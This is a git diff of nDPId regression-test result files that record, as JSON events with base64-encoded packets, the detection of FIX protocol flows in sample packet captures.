+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} +00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} +00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1261,"packets-processed":1261,"total-skipped-flows":0,"total-l4-data-len":37586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1493755132120} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1261/1261 diff --git a/test/results/fix2.pcap.out b/test/results/fix2.pcap.out index 5518b6e45..82733606c 100644 --- a/test/results/fix2.pcap.out +++ b/test/results/fix2.pcap.out @@ -1,17 +1,17 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614758889587} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889588,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889588,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"} -00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 